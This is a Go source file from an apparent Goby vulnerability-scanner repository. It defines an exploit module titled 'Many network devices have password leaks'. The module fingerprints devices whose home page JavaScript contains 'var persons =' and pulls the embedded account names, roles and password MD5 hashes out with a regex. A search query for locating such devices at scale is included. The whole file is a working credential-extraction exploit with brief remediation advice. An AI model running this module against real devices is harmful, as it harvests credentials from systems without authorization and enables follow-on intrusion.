-
Notifications
You must be signed in to change notification settings - Fork 197
/
Many_network_devices_have_password_leaks.go
112 lines (109 loc) · 3.12 KB
/
Many_network_devices_have_password_leaks.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Many network devices have password leaks",
"Description": "Visit the default login page, the JS code on the home page discloses account information, including role, account, password MD5 value, status and other information",
"Product": "Many network devices",
"Homepage": "https://gobies.org/",
"DisclosureDate": "2021-07-15",
"Author": "[email protected]",
"GobyQuery": "body=\"persons\"",
"Level": "2",
"Impact": "<p><span style=\"font-size: 14px;\">Information leakage is mainly caused by the negligence of developers or operations management personnel.</span><span style=\"font-size: 14px;\">If the debugging page is not deleted in time, the program debugging function is not closed, the program error information is not shielded, the backup file is not deleted, the database backup file is not deleted, the sensitive data information is not shielded and so on.</span><span style=\"font-size: 14px;\">The attacker can further analyze the attack target through the information he has mastered, so as to effectively launch the next effective attack</span><br></p>",
"Recommandation": "<p>1. Delete the affected files to avoid information leakage.</p><p>2. Set up a unified error report page</p>",
"References": [
"https://mp.weixin.qq.com/s/utv9ZX4HhDmEtbhBlhFBBQ"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "var persons =",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody|regex|var persons =(.*)"
]
}
],
"Tags": [
"information leakage"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Many network devices"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}